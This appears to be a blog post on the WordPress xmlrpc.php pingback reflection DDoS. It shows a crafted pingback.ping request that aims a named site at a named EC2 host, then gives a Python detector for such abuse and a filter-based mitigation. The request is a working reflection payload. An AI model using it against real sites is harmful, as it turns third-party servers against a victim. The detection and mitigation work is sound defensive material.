WordPress XMLRPC.php DDOS Attack

The Bigger They Come, The Harder They Fall

Earlier this year an attack was carried out that abused the Pingback feature of WordPress's XML-RPC interface (xmlrpc.php). I am going to show how to craft the request that reproduces it. The attack sent upwards of 400 Gbps through the internet. By comparison, your home network is, on a good day, theoretically 100 Mbps. This attack pumped 40x more traffic than your home network can ever do.


I created the request in Burp Proxy:


POST /xmlrpc.php HTTP/1.0
Host: prod.nestle-hcp.com.au
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://ec2-107-22-52-34.compute-1.amazonaws.com</string></value>
</param>
<param>
<value><string>https://prod.nestle-hcp.com.au/?p=45</string></value>
</param>
</params>
</methodCall>
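A site operator can spot this abuse on the WordPress side, because every request looks like the one above: a pingback.ping call whose first parameter (the source URL) is the host being flooded and whose second parameter is one of the site's own posts. The script below is an added example, not code from the post; it assumes the POST bodies sent to xmlrpc.php have been captured alongside the client IP, that the protected site is blog.example, and that three or more pingbacks naming the same source host in one batch are worth an alert.

```python
import xmlrpc.client
from collections import defaultdict
from urllib.parse import urlsplit

SITE_HOST = "blog.example"  # assumed hostname of the WordPress site being protected
THRESHOLD = 3               # pingback.ping calls naming one source host before alerting


def parse_pingback(body):
    """Return (source_url, target_url) for a pingback.ping call, else None."""
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception:  # malformed XML (as in the post's original capture) or a non-XML-RPC body
        return None
    if method != "pingback.ping" or len(params) != 2:
        return None
    return str(params[0]), str(params[1])


def find_reflection_abuse(requests, threshold=THRESHOLD):
    """requests: iterable of (client_ip, post_body).

    Returns {source_host: {"requests": n, "clients": [ips]}} for every source host
    that this site was asked to fetch at least `threshold` times.
    """
    hits = defaultdict(list)
    for client_ip, body in requests:
        parsed = parse_pingback(body)
        if parsed is None:
            continue
        source, target = parsed
        if urlsplit(target).hostname != SITE_HOST:
            continue  # pingback for a post this site does not host; WordPress rejects it anyway
        hits[urlsplit(source).hostname].append(client_ip)
    return {host: {"requests": len(ips), "clients": sorted(set(ips))}
            for host, ips in hits.items() if len(ips) >= threshold}


def pingback_body(source, target):
    """Build a well-formed pingback.ping body (the same shape as the Burp request above)."""
    return xmlrpc.client.dumps((source, target), methodname="pingback.ping")


# Constructed sample batch: three reflection attempts against victim.example, one
# legitimate-looking pingback, one for a foreign site, and one malformed body.
SAMPLE_REQUESTS = [
    ("198.51.100.7", pingback_body("http://victim.example/", "http://blog.example/?p=45")),
    ("198.51.100.7", pingback_body("http://victim.example/", "http://blog.example/?p=12")),
    ("198.51.100.9", pingback_body("http://victim.example/", "http://blog.example/?p=45")),
    ("203.0.113.4", pingback_body("http://friend.example/post/1", "http://blog.example/?p=45")),
    ("203.0.113.5", pingback_body("http://x.example/", "http://other.example/?p=1")),
    ("203.0.113.6", "<methodCall><methodName>pingback.ping</methodName><param><value>oops</script>"),
]

if __name__ == "__main__":
    print(find_reflection_abuse(SAMPLE_REQUESTS))
```

If pingbacks are not needed at all, WordPress's `xmlrpc_methods` filter can drop `pingback.ping` from the exposed method list so the site cannot be used as a reflector in the first place.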
